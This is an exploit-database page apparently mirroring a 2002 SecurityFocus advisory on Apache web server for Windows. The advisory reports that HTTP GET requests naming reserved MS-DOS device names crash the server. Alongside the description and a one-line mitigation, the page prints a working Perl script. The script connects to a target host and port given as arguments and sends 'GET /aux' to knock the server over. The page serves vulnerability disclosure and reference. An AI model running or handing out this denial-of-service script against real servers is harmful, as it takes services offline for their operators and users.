header-logo
Suggest Exploit
vendor:
Apache Web server for Microsoft Windows
by:
SecurityFocus
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Apache Web server for Microsoft Windows
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Apache Web server for Microsoft Windows Vulnerability

A vulnerability has been reported in Apache Web server for Microsoft Windows. The vulnerability exists in the way some HTTP requests are handled by the Apache Web server. Specifically, HTTP GET requests that involve reserved MS-DOS device names may cause the Apache Web server to crash.

Mitigation:

Apache should be configured to reject requests that contain MS-DOS device names.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6662/info

A vulnerability has been reported in Apache Web server for Microsoft Windows. The vulnerability exists in the way some HTTP requests are handled by the Apache Web server. Specifically, HTTP GET requests that involve reserved MS-DOS device names may cause the Apache Web server to crash.

#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1 || @ARGV > 2) {
	print STDOUT "Usage: perl $0 <host> <port=80>";
	exit;
}
if (@ARGV == 2) {
	$port = $ARGV[1];
} else {
	$port = 80;
}
$f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$ARGV[0], 
PeerPort=>$port);
print $f "GET /aux HTTP/1.0\r\n\r\n";

Navigation

Suggest Exploit

Services By CQR